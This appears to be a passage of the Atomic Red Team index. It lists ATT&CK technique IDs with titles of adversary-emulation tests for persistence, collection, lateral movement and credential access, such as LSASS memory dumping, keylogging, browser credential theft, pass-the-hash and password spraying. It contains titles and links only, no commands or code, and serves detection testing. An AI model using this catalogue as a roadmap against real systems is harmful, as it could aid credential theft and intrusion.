- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- [T1137.002 Office Application Startup: Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence [windows]
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- Atomic Test #7: MacOS Swift Keylogger [macos]
- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- Atomic Test #3: using Quicktime Player [macos]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #3: Execute commands from clipboard [macos]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
- Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
- T1213.001 Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.002 Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1076 Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1563.002 Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1021.001 Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1077 Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- Atomic Test #7: MacOS Swift Keylogger [macos]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
- Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe [windows]
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
- Atomic Test #1: Azure - Search Azure AD User Attributes for Passwords [azure-ad]
- Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.002 Brute Force: Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1606.002 Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
- Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
- Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
- Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- Atomic Test #5: Simulating access to Opera Login Data [windows]
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
- Atomic Test #11: WinPwn - BrowserPwn [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
- Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
- Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
- Atomic Test #7: Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) [azure-ad]
- Atomic Test #8: Password Spray using Kerbrute Tool [windows]
- Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
